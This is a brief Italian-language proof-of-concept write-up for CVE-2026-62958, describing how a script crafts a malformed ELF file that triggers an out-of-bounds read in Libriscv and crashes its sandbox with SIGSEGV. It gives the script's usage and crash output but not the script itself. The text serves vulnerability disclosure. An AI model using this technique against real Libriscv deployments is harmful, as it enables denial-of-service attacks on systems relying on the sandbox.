
Proof-of-concept per CVE-2026-62958: crea un ELF malformato per innescare una lettura fuori dai limiti in Libriscv e crashare la sandbox con SIGSEGV.
Una vulnerabilità in Libriscv permette all'attaccante di far crashare la sandbox utilizzando una lettura fuori dai limiti.
Per creare Bad elf:
python3 poc.py samplefile poisoned_file
Risultati:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)